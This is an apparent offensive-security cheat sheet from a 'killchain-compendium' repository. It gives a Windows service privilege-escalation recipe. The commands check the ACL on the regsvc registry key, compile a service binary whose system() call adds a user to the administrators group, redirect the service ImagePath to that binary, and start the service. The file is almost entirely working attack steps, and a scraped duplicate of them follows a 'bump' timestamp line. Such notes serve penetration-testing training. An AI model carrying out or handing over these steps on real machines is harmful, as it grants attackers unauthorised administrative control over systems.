killchain-compendium/exploit/windows/service_escalation/service_escalation.md

# Service Escalation

* Check service control permission 
```sh
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
```
* Add command to system() function inside `service.c`, e.g. add user to administrators group
```sh
cmd.exe /k net localgroup administrators user /add
```
* Compile via  
```sh
x86_64-w64-mingw32-gcc service.c service.exe
```
* Upload to target and
```sh
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Temp\service.exe /f
sc start regsvc
```
bump 2021-10-31 02:43:24 +02:00			`# Service Escalation`

			`* Check service control permission`
			```sh
			`Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc \| fl`
			```
			* Add command to system() function inside `service.c`, e.g. add user to administrators group
			```sh
			`cmd.exe /k net localgroup administrators user /add`
			```
			`* Compile via`
			```sh
			`x86_64-w64-mingw32-gcc service.c service.exe`
			```
			`* Upload to target and`
			```sh
			`reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Temp\service.exe /f`
			`sc start regsvc`
			```